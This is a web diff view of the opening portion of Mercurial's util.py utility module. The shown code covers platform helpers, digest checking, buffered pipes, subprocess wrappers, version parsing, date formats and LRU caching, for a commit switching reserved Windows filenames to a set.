##// END OF EJS Templates
util: use set for reserved Windows filenames...
Gregory Szorc -
r34054:ca6a3852 default
parent child Browse files
Show More
@@ -1,3773 +1,3775 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import os
30 30 import platform as pyplatform
31 31 import re as remod
32 32 import shutil
33 33 import signal
34 34 import socket
35 35 import stat
36 36 import string
37 37 import subprocess
38 38 import sys
39 39 import tempfile
40 40 import textwrap
41 41 import time
42 42 import traceback
43 43 import warnings
44 44 import zlib
45 45
46 46 from . import (
47 47 encoding,
48 48 error,
49 49 i18n,
50 50 policy,
51 51 pycompat,
52 52 )
53 53
54 54 base85 = policy.importmod(r'base85')
55 55 osutil = policy.importmod(r'osutil')
56 56 parsers = policy.importmod(r'parsers')
57 57
58 58 b85decode = base85.b85decode
59 59 b85encode = base85.b85encode
60 60
61 61 cookielib = pycompat.cookielib
62 62 empty = pycompat.empty
63 63 httplib = pycompat.httplib
64 64 httpserver = pycompat.httpserver
65 65 pickle = pycompat.pickle
66 66 queue = pycompat.queue
67 67 socketserver = pycompat.socketserver
68 68 stderr = pycompat.stderr
69 69 stdin = pycompat.stdin
70 70 stdout = pycompat.stdout
71 71 stringio = pycompat.stringio
72 72 urlerr = pycompat.urlerr
73 73 urlreq = pycompat.urlreq
74 74 xmlrpclib = pycompat.xmlrpclib
75 75
76 76 # workaround for win32mbcs
77 77 _filenamebytestr = pycompat.bytestr
78 78
79 79 def isatty(fp):
80 80 try:
81 81 return fp.isatty()
82 82 except AttributeError:
83 83 return False
84 84
85 85 # glibc determines buffering on first write to stdout - if we replace a TTY
86 86 # destined stdout with a pipe destined stdout (e.g. pager), we want line
87 87 # buffering
88 88 if isatty(stdout):
89 89 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
90 90
91 91 if pycompat.osname == 'nt':
92 92 from . import windows as platform
93 93 stdout = platform.winstdout(stdout)
94 94 else:
95 95 from . import posix as platform
96 96
97 97 _ = i18n._
98 98
99 99 bindunixsocket = platform.bindunixsocket
100 100 cachestat = platform.cachestat
101 101 checkexec = platform.checkexec
102 102 checklink = platform.checklink
103 103 copymode = platform.copymode
104 104 executablepath = platform.executablepath
105 105 expandglobs = platform.expandglobs
106 106 explainexit = platform.explainexit
107 107 findexe = platform.findexe
108 108 gethgcmd = platform.gethgcmd
109 109 getuser = platform.getuser
110 110 getpid = os.getpid
111 111 groupmembers = platform.groupmembers
112 112 groupname = platform.groupname
113 113 hidewindow = platform.hidewindow
114 114 isexec = platform.isexec
115 115 isowner = platform.isowner
116 116 listdir = osutil.listdir
117 117 localpath = platform.localpath
118 118 lookupreg = platform.lookupreg
119 119 makedir = platform.makedir
120 120 nlinks = platform.nlinks
121 121 normpath = platform.normpath
122 122 normcase = platform.normcase
123 123 normcasespec = platform.normcasespec
124 124 normcasefallback = platform.normcasefallback
125 125 openhardlinks = platform.openhardlinks
126 126 oslink = platform.oslink
127 127 parsepatchoutput = platform.parsepatchoutput
128 128 pconvert = platform.pconvert
129 129 poll = platform.poll
130 130 popen = platform.popen
131 131 posixfile = platform.posixfile
132 132 quotecommand = platform.quotecommand
133 133 readpipe = platform.readpipe
134 134 rename = platform.rename
135 135 removedirs = platform.removedirs
136 136 samedevice = platform.samedevice
137 137 samefile = platform.samefile
138 138 samestat = platform.samestat
139 139 setbinary = platform.setbinary
140 140 setflags = platform.setflags
141 141 setsignalhandler = platform.setsignalhandler
142 142 shellquote = platform.shellquote
143 143 spawndetached = platform.spawndetached
144 144 split = platform.split
145 145 sshargs = platform.sshargs
146 146 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
147 147 statisexec = platform.statisexec
148 148 statislink = platform.statislink
149 149 testpid = platform.testpid
150 150 umask = platform.umask
151 151 unlink = platform.unlink
152 152 username = platform.username
153 153
154 154 try:
155 155 recvfds = osutil.recvfds
156 156 except AttributeError:
157 157 pass
158 158 try:
159 159 setprocname = osutil.setprocname
160 160 except AttributeError:
161 161 pass
162 162
163 163 # Python compatibility
164 164
165 165 _notset = object()
166 166
167 167 # disable Python's problematic floating point timestamps (issue4836)
168 168 # (Python hypocritically says you shouldn't change this behavior in
169 169 # libraries, and sure enough Mercurial is not a library.)
170 170 os.stat_float_times(False)
171 171
172 172 def safehasattr(thing, attr):
173 173 return getattr(thing, attr, _notset) is not _notset
174 174
175 175 def bytesinput(fin, fout, *args, **kwargs):
176 176 sin, sout = sys.stdin, sys.stdout
177 177 try:
178 178 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
179 179 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
180 180 finally:
181 181 sys.stdin, sys.stdout = sin, sout
182 182
183 183 def bitsfrom(container):
184 184 bits = 0
185 185 for bit in container:
186 186 bits |= bit
187 187 return bits
188 188
189 189 # python 2.6 still have deprecation warning enabled by default. We do not want
190 190 # to display anything to standard user so detect if we are running test and
191 191 # only use python deprecation warning in this case.
192 192 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
193 193 if _dowarn:
194 194 # explicitly unfilter our warning for python 2.7
195 195 #
196 196 # The option of setting PYTHONWARNINGS in the test runner was investigated.
197 197 # However, module name set through PYTHONWARNINGS was exactly matched, so
198 198 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
199 199 # makes the whole PYTHONWARNINGS thing useless for our usecase.
200 200 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
201 201 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
202 202 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
203 203
204 204 def nouideprecwarn(msg, version, stacklevel=1):
205 205 """Issue an python native deprecation warning
206 206
207 207 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
208 208 """
209 209 if _dowarn:
210 210 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
211 211 " update your code.)") % version
212 212 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
213 213
214 214 DIGESTS = {
215 215 'md5': hashlib.md5,
216 216 'sha1': hashlib.sha1,
217 217 'sha512': hashlib.sha512,
218 218 }
219 219 # List of digest types from strongest to weakest
220 220 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
221 221
222 222 for k in DIGESTS_BY_STRENGTH:
223 223 assert k in DIGESTS
224 224
225 225 class digester(object):
226 226 """helper to compute digests.
227 227
228 228 This helper can be used to compute one or more digests given their name.
229 229
230 230 >>> d = digester(['md5', 'sha1'])
231 231 >>> d.update('foo')
232 232 >>> [k for k in sorted(d)]
233 233 ['md5', 'sha1']
234 234 >>> d['md5']
235 235 'acbd18db4cc2f85cedef654fccc4a4d8'
236 236 >>> d['sha1']
237 237 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
238 238 >>> digester.preferred(['md5', 'sha1'])
239 239 'sha1'
240 240 """
241 241
242 242 def __init__(self, digests, s=''):
243 243 self._hashes = {}
244 244 for k in digests:
245 245 if k not in DIGESTS:
246 246 raise Abort(_('unknown digest type: %s') % k)
247 247 self._hashes[k] = DIGESTS[k]()
248 248 if s:
249 249 self.update(s)
250 250
251 251 def update(self, data):
252 252 for h in self._hashes.values():
253 253 h.update(data)
254 254
255 255 def __getitem__(self, key):
256 256 if key not in DIGESTS:
257 257 raise Abort(_('unknown digest type: %s') % k)
258 258 return self._hashes[key].hexdigest()
259 259
260 260 def __iter__(self):
261 261 return iter(self._hashes)
262 262
263 263 @staticmethod
264 264 def preferred(supported):
265 265 """returns the strongest digest type in both supported and DIGESTS."""
266 266
267 267 for k in DIGESTS_BY_STRENGTH:
268 268 if k in supported:
269 269 return k
270 270 return None
271 271
272 272 class digestchecker(object):
273 273 """file handle wrapper that additionally checks content against a given
274 274 size and digests.
275 275
276 276 d = digestchecker(fh, size, {'md5': '...'})
277 277
278 278 When multiple digests are given, all of them are validated.
279 279 """
280 280
281 281 def __init__(self, fh, size, digests):
282 282 self._fh = fh
283 283 self._size = size
284 284 self._got = 0
285 285 self._digests = dict(digests)
286 286 self._digester = digester(self._digests.keys())
287 287
288 288 def read(self, length=-1):
289 289 content = self._fh.read(length)
290 290 self._digester.update(content)
291 291 self._got += len(content)
292 292 return content
293 293
294 294 def validate(self):
295 295 if self._size != self._got:
296 296 raise Abort(_('size mismatch: expected %d, got %d') %
297 297 (self._size, self._got))
298 298 for k, v in self._digests.items():
299 299 if v != self._digester[k]:
300 300 # i18n: first parameter is a digest name
301 301 raise Abort(_('%s mismatch: expected %s, got %s') %
302 302 (k, v, self._digester[k]))
303 303
304 304 try:
305 305 buffer = buffer
306 306 except NameError:
307 307 def buffer(sliceable, offset=0, length=None):
308 308 if length is not None:
309 309 return memoryview(sliceable)[offset:offset + length]
310 310 return memoryview(sliceable)[offset:]
311 311
312 312 closefds = pycompat.osname == 'posix'
313 313
314 314 _chunksize = 4096
315 315
316 316 class bufferedinputpipe(object):
317 317 """a manually buffered input pipe
318 318
319 319 Python will not let us use buffered IO and lazy reading with 'polling' at
320 320 the same time. We cannot probe the buffer state and select will not detect
321 321 that data are ready to read if they are already buffered.
322 322
323 323 This class let us work around that by implementing its own buffering
324 324 (allowing efficient readline) while offering a way to know if the buffer is
325 325 empty from the output (allowing collaboration of the buffer with polling).
326 326
327 327 This class lives in the 'util' module because it makes use of the 'os'
328 328 module from the python stdlib.
329 329 """
330 330
331 331 def __init__(self, input):
332 332 self._input = input
333 333 self._buffer = []
334 334 self._eof = False
335 335 self._lenbuf = 0
336 336
337 337 @property
338 338 def hasbuffer(self):
339 339 """True is any data is currently buffered
340 340
341 341 This will be used externally a pre-step for polling IO. If there is
342 342 already data then no polling should be set in place."""
343 343 return bool(self._buffer)
344 344
345 345 @property
346 346 def closed(self):
347 347 return self._input.closed
348 348
349 349 def fileno(self):
350 350 return self._input.fileno()
351 351
352 352 def close(self):
353 353 return self._input.close()
354 354
355 355 def read(self, size):
356 356 while (not self._eof) and (self._lenbuf < size):
357 357 self._fillbuffer()
358 358 return self._frombuffer(size)
359 359
360 360 def readline(self, *args, **kwargs):
361 361 if 1 < len(self._buffer):
362 362 # this should not happen because both read and readline end with a
363 363 # _frombuffer call that collapse it.
364 364 self._buffer = [''.join(self._buffer)]
365 365 self._lenbuf = len(self._buffer[0])
366 366 lfi = -1
367 367 if self._buffer:
368 368 lfi = self._buffer[-1].find('\n')
369 369 while (not self._eof) and lfi < 0:
370 370 self._fillbuffer()
371 371 if self._buffer:
372 372 lfi = self._buffer[-1].find('\n')
373 373 size = lfi + 1
374 374 if lfi < 0: # end of file
375 375 size = self._lenbuf
376 376 elif 1 < len(self._buffer):
377 377 # we need to take previous chunks into account
378 378 size += self._lenbuf - len(self._buffer[-1])
379 379 return self._frombuffer(size)
380 380
381 381 def _frombuffer(self, size):
382 382 """return at most 'size' data from the buffer
383 383
384 384 The data are removed from the buffer."""
385 385 if size == 0 or not self._buffer:
386 386 return ''
387 387 buf = self._buffer[0]
388 388 if 1 < len(self._buffer):
389 389 buf = ''.join(self._buffer)
390 390
391 391 data = buf[:size]
392 392 buf = buf[len(data):]
393 393 if buf:
394 394 self._buffer = [buf]
395 395 self._lenbuf = len(buf)
396 396 else:
397 397 self._buffer = []
398 398 self._lenbuf = 0
399 399 return data
400 400
401 401 def _fillbuffer(self):
402 402 """read data to the buffer"""
403 403 data = os.read(self._input.fileno(), _chunksize)
404 404 if not data:
405 405 self._eof = True
406 406 else:
407 407 self._lenbuf += len(data)
408 408 self._buffer.append(data)
409 409
410 410 def popen2(cmd, env=None, newlines=False):
411 411 # Setting bufsize to -1 lets the system decide the buffer size.
412 412 # The default for bufsize is 0, meaning unbuffered. This leads to
413 413 # poor performance on Mac OS X: http://bugs.python.org/issue4194
414 414 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
415 415 close_fds=closefds,
416 416 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
417 417 universal_newlines=newlines,
418 418 env=env)
419 419 return p.stdin, p.stdout
420 420
421 421 def popen3(cmd, env=None, newlines=False):
422 422 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
423 423 return stdin, stdout, stderr
424 424
425 425 def popen4(cmd, env=None, newlines=False, bufsize=-1):
426 426 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
427 427 close_fds=closefds,
428 428 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
429 429 stderr=subprocess.PIPE,
430 430 universal_newlines=newlines,
431 431 env=env)
432 432 return p.stdin, p.stdout, p.stderr, p
433 433
434 434 def version():
435 435 """Return version information if available."""
436 436 try:
437 437 from . import __version__
438 438 return __version__.version
439 439 except ImportError:
440 440 return 'unknown'
441 441
442 442 def versiontuple(v=None, n=4):
443 443 """Parses a Mercurial version string into an N-tuple.
444 444
445 445 The version string to be parsed is specified with the ``v`` argument.
446 446 If it isn't defined, the current Mercurial version string will be parsed.
447 447
448 448 ``n`` can be 2, 3, or 4. Here is how some version strings map to
449 449 returned values:
450 450
451 451 >>> v = '3.6.1+190-df9b73d2d444'
452 452 >>> versiontuple(v, 2)
453 453 (3, 6)
454 454 >>> versiontuple(v, 3)
455 455 (3, 6, 1)
456 456 >>> versiontuple(v, 4)
457 457 (3, 6, 1, '190-df9b73d2d444')
458 458
459 459 >>> versiontuple('3.6.1+190-df9b73d2d444+20151118')
460 460 (3, 6, 1, '190-df9b73d2d444+20151118')
461 461
462 462 >>> v = '3.6'
463 463 >>> versiontuple(v, 2)
464 464 (3, 6)
465 465 >>> versiontuple(v, 3)
466 466 (3, 6, None)
467 467 >>> versiontuple(v, 4)
468 468 (3, 6, None, None)
469 469
470 470 >>> v = '3.9-rc'
471 471 >>> versiontuple(v, 2)
472 472 (3, 9)
473 473 >>> versiontuple(v, 3)
474 474 (3, 9, None)
475 475 >>> versiontuple(v, 4)
476 476 (3, 9, None, 'rc')
477 477
478 478 >>> v = '3.9-rc+2-02a8fea4289b'
479 479 >>> versiontuple(v, 2)
480 480 (3, 9)
481 481 >>> versiontuple(v, 3)
482 482 (3, 9, None)
483 483 >>> versiontuple(v, 4)
484 484 (3, 9, None, 'rc+2-02a8fea4289b')
485 485 """
486 486 if not v:
487 487 v = version()
488 488 parts = remod.split('[\+-]', v, 1)
489 489 if len(parts) == 1:
490 490 vparts, extra = parts[0], None
491 491 else:
492 492 vparts, extra = parts
493 493
494 494 vints = []
495 495 for i in vparts.split('.'):
496 496 try:
497 497 vints.append(int(i))
498 498 except ValueError:
499 499 break
500 500 # (3, 6) -> (3, 6, None)
501 501 while len(vints) < 3:
502 502 vints.append(None)
503 503
504 504 if n == 2:
505 505 return (vints[0], vints[1])
506 506 if n == 3:
507 507 return (vints[0], vints[1], vints[2])
508 508 if n == 4:
509 509 return (vints[0], vints[1], vints[2], extra)
510 510
511 511 # used by parsedate
512 512 defaultdateformats = (
513 513 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
514 514 '%Y-%m-%dT%H:%M', # without seconds
515 515 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
516 516 '%Y-%m-%dT%H%M', # without seconds
517 517 '%Y-%m-%d %H:%M:%S', # our common legal variant
518 518 '%Y-%m-%d %H:%M', # without seconds
519 519 '%Y-%m-%d %H%M%S', # without :
520 520 '%Y-%m-%d %H%M', # without seconds
521 521 '%Y-%m-%d %I:%M:%S%p',
522 522 '%Y-%m-%d %H:%M',
523 523 '%Y-%m-%d %I:%M%p',
524 524 '%Y-%m-%d',
525 525 '%m-%d',
526 526 '%m/%d',
527 527 '%m/%d/%y',
528 528 '%m/%d/%Y',
529 529 '%a %b %d %H:%M:%S %Y',
530 530 '%a %b %d %I:%M:%S%p %Y',
531 531 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
532 532 '%b %d %H:%M:%S %Y',
533 533 '%b %d %I:%M:%S%p %Y',
534 534 '%b %d %H:%M:%S',
535 535 '%b %d %I:%M:%S%p',
536 536 '%b %d %H:%M',
537 537 '%b %d %I:%M%p',
538 538 '%b %d %Y',
539 539 '%b %d',
540 540 '%H:%M:%S',
541 541 '%I:%M:%S%p',
542 542 '%H:%M',
543 543 '%I:%M%p',
544 544 )
545 545
546 546 extendeddateformats = defaultdateformats + (
547 547 "%Y",
548 548 "%Y-%m",
549 549 "%b",
550 550 "%b %Y",
551 551 )
552 552
553 553 def cachefunc(func):
554 554 '''cache the result of function calls'''
555 555 # XXX doesn't handle keywords args
556 556 if func.__code__.co_argcount == 0:
557 557 cache = []
558 558 def f():
559 559 if len(cache) == 0:
560 560 cache.append(func())
561 561 return cache[0]
562 562 return f
563 563 cache = {}
564 564 if func.__code__.co_argcount == 1:
565 565 # we gain a small amount of time because
566 566 # we don't need to pack/unpack the list
567 567 def f(arg):
568 568 if arg not in cache:
569 569 cache[arg] = func(arg)
570 570 return cache[arg]
571 571 else:
572 572 def f(*args):
573 573 if args not in cache:
574 574 cache[args] = func(*args)
575 575 return cache[args]
576 576
577 577 return f
578 578
579 579 class sortdict(collections.OrderedDict):
580 580 '''a simple sorted dictionary
581 581
582 582 >>> d1 = sortdict([('a', 0), ('b', 1)])
583 583 >>> d2 = d1.copy()
584 584 >>> d2
585 585 sortdict([('a', 0), ('b', 1)])
586 586 >>> d2.update([('a', 2)])
587 587 >>> d2.keys() # should still be in last-set order
588 588 ['b', 'a']
589 589 '''
590 590
591 591 def __setitem__(self, key, value):
592 592 if key in self:
593 593 del self[key]
594 594 super(sortdict, self).__setitem__(key, value)
595 595
596 596 if pycompat.ispypy:
597 597 # __setitem__() isn't called as of PyPy 5.8.0
598 598 def update(self, src):
599 599 if isinstance(src, dict):
600 600 src = src.iteritems()
601 601 for k, v in src:
602 602 self[k] = v
603 603
604 604 class transactional(object):
605 605 """Base class for making a transactional type into a context manager."""
606 606 __metaclass__ = abc.ABCMeta
607 607
608 608 @abc.abstractmethod
609 609 def close(self):
610 610 """Successfully closes the transaction."""
611 611
612 612 @abc.abstractmethod
613 613 def release(self):
614 614 """Marks the end of the transaction.
615 615
616 616 If the transaction has not been closed, it will be aborted.
617 617 """
618 618
619 619 def __enter__(self):
620 620 return self
621 621
622 622 def __exit__(self, exc_type, exc_val, exc_tb):
623 623 try:
624 624 if exc_type is None:
625 625 self.close()
626 626 finally:
627 627 self.release()
628 628
629 629 @contextlib.contextmanager
630 630 def acceptintervention(tr=None):
631 631 """A context manager that closes the transaction on InterventionRequired
632 632
633 633 If no transaction was provided, this simply runs the body and returns
634 634 """
635 635 if not tr:
636 636 yield
637 637 return
638 638 try:
639 639 yield
640 640 tr.close()
641 641 except error.InterventionRequired:
642 642 tr.close()
643 643 raise
644 644 finally:
645 645 tr.release()
646 646
647 647 @contextlib.contextmanager
648 648 def nullcontextmanager():
649 649 yield
650 650
651 651 class _lrucachenode(object):
652 652 """A node in a doubly linked list.
653 653
654 654 Holds a reference to nodes on either side as well as a key-value
655 655 pair for the dictionary entry.
656 656 """
657 657 __slots__ = (u'next', u'prev', u'key', u'value')
658 658
659 659 def __init__(self):
660 660 self.next = None
661 661 self.prev = None
662 662
663 663 self.key = _notset
664 664 self.value = None
665 665
666 666 def markempty(self):
667 667 """Mark the node as emptied."""
668 668 self.key = _notset
669 669
670 670 class lrucachedict(object):
671 671 """Dict that caches most recent accesses and sets.
672 672
673 673 The dict consists of an actual backing dict - indexed by original
674 674 key - and a doubly linked circular list defining the order of entries in
675 675 the cache.
676 676
677 677 The head node is the newest entry in the cache. If the cache is full,
678 678 we recycle head.prev and make it the new head. Cache accesses result in
679 679 the node being moved to before the existing head and being marked as the
680 680 new head node.
681 681 """
682 682 def __init__(self, max):
683 683 self._cache = {}
684 684
685 685 self._head = head = _lrucachenode()
686 686 head.prev = head
687 687 head.next = head
688 688 self._size = 1
689 689 self._capacity = max
690 690
691 691 def __len__(self):
692 692 return len(self._cache)
693 693
694 694 def __contains__(self, k):
695 695 return k in self._cache
696 696
697 697 def __iter__(self):
698 698 # We don't have to iterate in cache order, but why not.
699 699 n = self._head
700 700 for i in range(len(self._cache)):
701 701 yield n.key
702 702 n = n.next
703 703
704 704 def __getitem__(self, k):
705 705 node = self._cache[k]
706 706 self._movetohead(node)
707 707 return node.value
708 708
709 709 def __setitem__(self, k, v):
710 710 node = self._cache.get(k)
711 711 # Replace existing value and mark as newest.
712 712 if node is not None:
713 713 node.value = v
714 714 self._movetohead(node)
715 715 return
716 716
717 717 if self._size < self._capacity:
718 718 node = self._addcapacity()
719 719 else:
720 720 # Grab the last/oldest item.
721 721 node = self._head.prev
722 722
723 723 # At capacity. Kill the old entry.
724 724 if node.key is not _notset:
725 725 del self._cache[node.key]
726 726
727 727 node.key = k
728 728 node.value = v
729 729 self._cache[k] = node
730 730 # And mark it as newest entry. No need to adjust order since it
731 731 # is already self._head.prev.
732 732 self._head = node
733 733
734 734 def __delitem__(self, k):
735 735 node = self._cache.pop(k)
736 736 node.markempty()
737 737
738 738 # Temporarily mark as newest item before re-adjusting head to make
739 739 # this node the oldest item.
740 740 self._movetohead(node)
741 741 self._head = node.next
742 742
743 743 # Additional dict methods.
744 744
745 745 def get(self, k, default=None):
746 746 try:
747 747 return self._cache[k].value
748 748 except KeyError:
749 749 return default
750 750
751 751 def clear(self):
752 752 n = self._head
753 753 while n.key is not _notset:
754 754 n.markempty()
755 755 n = n.next
756 756
757 757 self._cache.clear()
758 758
759 759 def copy(self):
760 760 result = lrucachedict(self._capacity)
761 761 n = self._head.prev
762 762 # Iterate in oldest-to-newest order, so the copy has the right ordering
763 763 for i in range(len(self._cache)):
764 764 result[n.key] = n.value
765 765 n = n.prev
766 766 return result
767 767
768 768 def _movetohead(self, node):
769 769 """Mark a node as the newest, making it the new head.
770 770
771 771 When a node is accessed, it becomes the freshest entry in the LRU
772 772 list, which is denoted by self._head.
773 773
774 774 Visually, let's make ``N`` the new head node (* denotes head):
775 775
776 776 previous/oldest <-> head <-> next/next newest
777 777
778 778 ----<->--- A* ---<->-----
779 779 | |
780 780 E <-> D <-> N <-> C <-> B
781 781
782 782 To:
783 783
784 784 ----<->--- N* ---<->-----
785 785 | |
786 786 E <-> D <-> C <-> B <-> A
787 787
788 788 This requires the following moves:
789 789
790 790 C.next = D (node.prev.next = node.next)
791 791 D.prev = C (node.next.prev = node.prev)
792 792 E.next = N (head.prev.next = node)
793 793 N.prev = E (node.prev = head.prev)
794 794 N.next = A (node.next = head)
795 795 A.prev = N (head.prev = node)
796 796 """
797 797 head = self._head
798 798 # C.next = D
799 799 node.prev.next = node.next
800 800 # D.prev = C
801 801 node.next.prev = node.prev
802 802 # N.prev = E
803 803 node.prev = head.prev
804 804 # N.next = A
805 805 # It is tempting to do just "head" here, however if node is
806 806 # adjacent to head, this will do bad things.
807 807 node.next = head.prev.next
808 808 # E.next = N
809 809 node.next.prev = node
810 810 # A.prev = N
811 811 node.prev.next = node
812 812
813 813 self._head = node
814 814
815 815 def _addcapacity(self):
816 816 """Add a node to the circular linked list.
817 817
818 818 The new node is inserted before the head node.
819 819 """
820 820 head = self._head
821 821 node = _lrucachenode()
822 822 head.prev.next = node
823 823 node.prev = head.prev
824 824 node.next = head
825 825 head.prev = node
826 826 self._size += 1
827 827 return node
828 828
829 829 def lrucachefunc(func):
830 830 '''cache most recent results of function calls'''
831 831 cache = {}
832 832 order = collections.deque()
833 833 if func.__code__.co_argcount == 1:
834 834 def f(arg):
835 835 if arg not in cache:
836 836 if len(cache) > 20:
837 837 del cache[order.popleft()]
838 838 cache[arg] = func(arg)
839 839 else:
840 840 order.remove(arg)
841 841 order.append(arg)
842 842 return cache[arg]
843 843 else:
844 844 def f(*args):
845 845 if args not in cache:
846 846 if len(cache) > 20:
847 847 del cache[order.popleft()]
848 848 cache[args] = func(*args)
849 849 else:
850 850 order.remove(args)
851 851 order.append(args)
852 852 return cache[args]
853 853
854 854 return f
855 855
856 856 class propertycache(object):
857 857 def __init__(self, func):
858 858 self.func = func
859 859 self.name = func.__name__
860 860 def __get__(self, obj, type=None):
861 861 result = self.func(obj)
862 862 self.cachevalue(obj, result)
863 863 return result
864 864
865 865 def cachevalue(self, obj, value):
866 866 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
867 867 obj.__dict__[self.name] = value
868 868
869 869 def pipefilter(s, cmd):
870 870 '''filter string S through command CMD, returning its output'''
871 871 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
872 872 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
873 873 pout, perr = p.communicate(s)
874 874 return pout
875 875
876 876 def tempfilter(s, cmd):
877 877 '''filter string S through a pair of temporary files with CMD.
878 878 CMD is used as a template to create the real command to be run,
879 879 with the strings INFILE and OUTFILE replaced by the real names of
880 880 the temporary files generated.'''
881 881 inname, outname = None, None
882 882 try:
883 883 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
884 884 fp = os.fdopen(infd, pycompat.sysstr('wb'))
885 885 fp.write(s)
886 886 fp.close()
887 887 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
888 888 os.close(outfd)
889 889 cmd = cmd.replace('INFILE', inname)
890 890 cmd = cmd.replace('OUTFILE', outname)
891 891 code = os.system(cmd)
892 892 if pycompat.sysplatform == 'OpenVMS' and code & 1:
893 893 code = 0
894 894 if code:
895 895 raise Abort(_("command '%s' failed: %s") %
896 896 (cmd, explainexit(code)))
897 897 return readfile(outname)
898 898 finally:
899 899 try:
900 900 if inname:
901 901 os.unlink(inname)
902 902 except OSError:
903 903 pass
904 904 try:
905 905 if outname:
906 906 os.unlink(outname)
907 907 except OSError:
908 908 pass
909 909
910 910 filtertable = {
911 911 'tempfile:': tempfilter,
912 912 'pipe:': pipefilter,
913 913 }
914 914
915 915 def filter(s, cmd):
916 916 "filter a string through a command that transforms its input to its output"
917 917 for name, fn in filtertable.iteritems():
918 918 if cmd.startswith(name):
919 919 return fn(s, cmd[len(name):].lstrip())
920 920 return pipefilter(s, cmd)
921 921
922 922 def binary(s):
923 923 """return true if a string is binary data"""
924 924 return bool(s and '\0' in s)
925 925
926 926 def increasingchunks(source, min=1024, max=65536):
927 927 '''return no less than min bytes per chunk while data remains,
928 928 doubling min after each chunk until it reaches max'''
929 929 def log2(x):
930 930 if not x:
931 931 return 0
932 932 i = 0
933 933 while x:
934 934 x >>= 1
935 935 i += 1
936 936 return i - 1
937 937
938 938 buf = []
939 939 blen = 0
940 940 for chunk in source:
941 941 buf.append(chunk)
942 942 blen += len(chunk)
943 943 if blen >= min:
944 944 if min < max:
945 945 min = min << 1
946 946 nmin = 1 << log2(blen)
947 947 if nmin > min:
948 948 min = nmin
949 949 if min > max:
950 950 min = max
951 951 yield ''.join(buf)
952 952 blen = 0
953 953 buf = []
954 954 if buf:
955 955 yield ''.join(buf)
956 956
957 957 Abort = error.Abort
958 958
959 959 def always(fn):
960 960 return True
961 961
962 962 def never(fn):
963 963 return False
964 964
965 965 def nogc(func):
966 966 """disable garbage collector
967 967
968 968 Python's garbage collector triggers a GC each time a certain number of
969 969 container objects (the number being defined by gc.get_threshold()) are
970 970 allocated even when marked not to be tracked by the collector. Tracking has
971 971 no effect on when GCs are triggered, only on what objects the GC looks
972 972 into. As a workaround, disable GC while building complex (huge)
973 973 containers.
974 974
975 975 This garbage collector issue have been fixed in 2.7. But it still affect
976 976 CPython's performance.
977 977 """
978 978 def wrapper(*args, **kwargs):
979 979 gcenabled = gc.isenabled()
980 980 gc.disable()
981 981 try:
982 982 return func(*args, **kwargs)
983 983 finally:
984 984 if gcenabled:
985 985 gc.enable()
986 986 return wrapper
987 987
988 988 if pycompat.ispypy:
989 989 # PyPy runs slower with gc disabled
990 990 nogc = lambda x: x
991 991
992 992 def pathto(root, n1, n2):
993 993 '''return the relative path from one place to another.
994 994 root should use os.sep to separate directories
995 995 n1 should use os.sep to separate directories
996 996 n2 should use "/" to separate directories
997 997 returns an os.sep-separated path.
998 998
999 999 If n1 is a relative path, it's assumed it's
1000 1000 relative to root.
1001 1001 n2 should always be relative to root.
1002 1002 '''
1003 1003 if not n1:
1004 1004 return localpath(n2)
1005 1005 if os.path.isabs(n1):
1006 1006 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1007 1007 return os.path.join(root, localpath(n2))
1008 1008 n2 = '/'.join((pconvert(root), n2))
1009 1009 a, b = splitpath(n1), n2.split('/')
1010 1010 a.reverse()
1011 1011 b.reverse()
1012 1012 while a and b and a[-1] == b[-1]:
1013 1013 a.pop()
1014 1014 b.pop()
1015 1015 b.reverse()
1016 1016 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1017 1017
1018 1018 def mainfrozen():
1019 1019 """return True if we are a frozen executable.
1020 1020
1021 1021 The code supports py2exe (most common, Windows only) and tools/freeze
1022 1022 (portable, not much used).
1023 1023 """
1024 1024 return (safehasattr(sys, "frozen") or # new py2exe
1025 1025 safehasattr(sys, "importers") or # old py2exe
1026 1026 imp.is_frozen(u"__main__")) # tools/freeze
1027 1027
1028 1028 # the location of data files matching the source code
1029 1029 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
